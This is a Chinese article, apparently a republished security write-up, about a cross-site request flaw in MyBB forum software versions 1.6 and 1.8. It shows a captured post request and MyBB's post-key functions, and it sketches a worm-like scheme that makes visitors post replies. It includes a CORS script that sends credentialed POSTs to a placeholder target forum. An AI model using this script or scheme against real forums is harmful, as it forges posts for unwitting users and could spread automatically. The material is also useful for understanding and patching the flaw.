扫一扫
分享文章到微信
扫一扫
关注官方公众号
至顶头条
MyBB是国际上非常优秀的免费论坛软件,最大的特色是简单但是功能却出奇的强大。支持多国语言,可以分别设置前台后台的语言,每个用户都可以设置自己使用何种语言访问论坛包括自己的时区等,自定义功能强大到没有做不到只有想不到。
漏洞影响多个版本
本次影响版本:1.6x & 1.8x
测试版本:1.8.3 (最新), 以及1.6.16 (1.6系列最新)
正是因为其强大影响力,我便开始肆意玩耍MyBB以及监控请求,在此期间我注意到一些极有可能导致漏洞出现的东西,这些都已经在多个站点上进行了测试。
测试过程
首先损坏MyBB很简单。当你去发布一个新的帖子,在提交时它会请求一些东西,以下为来自Hackforums论坛post请求的示例:
POST http://www.hackforums.net/newreply.php?tid=4602700&processed=1 HTTP/1.1
Host: www.hackforums.net
User-Agent: Mozilla/5.0 (Windows NT 5.3; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.hackforums.net/newreply.php?tid=4602700
Cookie: *
Connection: keep-alive
Content-Type: multipart/form-data; boundary=------71842462512788
Content-Length: 1588
------71842462512788
Content-Disposition: form-data; name="my_post_key"
******
------71842462512788
Content-Disposition: form-data; name="message_new"
Hey dude, I love your site Omni. Can I get a free upgrade?
------71842462512788
Content-Disposition: form-data; name="message"
Hey dude, I love your site Omni. Can I get a free upgrade?
------71842462512788
Content-Disposition: form-data; name="submit"
Post Reply
------71842462512788
Content-Disposition: form-data; name="action"
do_newreply
------71842462512788
Content-Disposition: form-data; name="replyto"
------71842462512788
Content-Disposition: form-data; name="posthash"
******
------71842462512788
Content-Disposition: form-data; name="attachmentaid"
------71842462512788
Content-Disposition: form-data; name="attachmentact"
------71842462512788
Content-Disposition: form-data; name="subject"
*
------71842462512788
Content-Disposition: form-data; name="quoted_ids"
------71842462512788
Content-Disposition: form-data; name="tid"
4602700
------71842462512788--
对于MyBB这个系统我们已经了解它的一些字段了,其中第一个就是post key,如果没有这个字段,我们就不能发送任何帖子。获取这个key十分简单,稍后我们会进行详细解释。现在我们需要获取的是posthash,posthash仅仅只是一个MD5字符串,只需创建一个有效的MD5字符串就可以绕过它。我可以告诉你这是因为占位符的原因,但是深究其内在不是我们今天要讨论的问题。
盯着message_new和message字段,MyBB会提交这两个字段,然而它仅显示message字段中的内容,而不会显示message_new字段中的内容。所以你可以在之前的帖子message_new字段中写入cocks,当然你无法从帖子中看出与之前有什么不同。
如何生成post key
post key会依赖以下函数:
functiongenerate_post_check(){global$mybb,$session;if($mybb->user['uid']){returnmd5($mybb->user['loginkey'].$mybb->user['salt'].$mybb->user['regdate']);}//Guestsgetaspecialstringelse{returnmd5($session->useragent.$mybb->config['database']['username'].$mybb->settings['internal']['encryption_key']);}}
接着验证post key是否调用该函数:
functionverify_post_check($code,$silent=false){global$lang;if(generate_post_check()!=$code){if($silent==true){returnfalse;}else{if(defined("IN_ADMINCP")){returnfalse;}else{ error($lang->invalid_post_code);}}}else{returntrue;}}
然后我们会看到它在查找loginkey, salt, regdate信息。现在我们获取这些信息是相当的容易(我不想过多解释,这个确实太容易了)一旦获得post key,只要其是可用的并且用户还未更改密码(目前大多数论坛用户很少有经常修改密码的习惯)。
好了,这就开始我们的攻击。首先我们需要确定一个攻击目标(我在本机上搭建了一个站点),接着我写了一个CORS脚本,然后用户通过浏览器点击一个用来请求帖子内容的URL,URL在另一端获取到请求后,进行处理但是不会进行消息提示。假设你构造了一个合法的请求,你将会看到网页的变化。
如何使用
基于不同的需求,可以构造不同的请求。这可用于提交帖子,获取论坛荣誉点等。如果你想把这个漏洞搞的像是蠕虫病毒一般,只需每个访问到帖子的人都在这个帖子下面继续回复(这个需要把更多的精力放在获取post key上),说实话这种可能非常高!
CORS代码
注意:这只是来自appsec-labs的示例代码,你需要进行一些修改以适合你的攻击目标:
//IsuggestaddingjQuerytotopoffile//YouwillhavetomodifythecodetomakeitmoreuseableasIwon'tbemodifyingitforyou.varurl='http://forum.mytarget.com/'; $(document).ready(function(){ corsMyBBPost();});functioncorsMyBBPost(){for(i=0;i<times;i++){ cors_send("post",url+"?proof_of_concept=1&req_num="+i,"post=data",false);}}functioncors_send(method,url,data,credentials){varcors;if(window.XDomainRequest){ cors=newXDomainRequest();if(cors){ cors.onprogress=function(){CORSstatus("Process")}; cors.onload=function(){CORSresult(cors.responseText)};}elseCORSstatus("BrowserdoesnotsupportCrossOriginRequest");}elseif(window.XMLHttpRequest){ cors=newXMLHttpRequest(); cors.onreadystatechange=function(){if(cors.readyState==4)CORSresult(cors.getAllResponseHeaders(),cors.responseText);elseCORSstatus("Process");}}else{CORSstatus("BrowserdoesnotsupportAJAX");} method=method.toUpperCase();if(method=="POST"||method=="PUT") cors.open(method,url,data);else cors.open(method,url);if(credentials) cors.withCredentials="true"; cors.setRequestHeader("Content-Type","application/x-www-form-urlencoded;charset=UTF-8"); cors.send(data);CORSstatus("CrossOriginResourceSharing-Start");}functionCORSstatus(msg){ console.log(msg);}functionCORSerror(msg){ console.log("Ohshit..."+msg);}
不加任何修饰,这代码十分简洁。在此我不会描述如何盗取post key的方法,如果你自己有何领悟那是你自己的事情。
最后,希望大家能够从中多学多一些东西。
最重要的是:玩的开心便好!
如果您非常迫切的想了解IT领域最新产品与技术信息,那么订阅至顶网技术邮件将是您的最佳途径之一。
现场直击|2021世界人工智能大会
直击5G创新地带,就在2021MWC上海
5G已至 转型当时——服务提供商如何把握转型的绝佳时机
寻找自己的Flag
华为开发者大会2020(Cloud)- 科技行者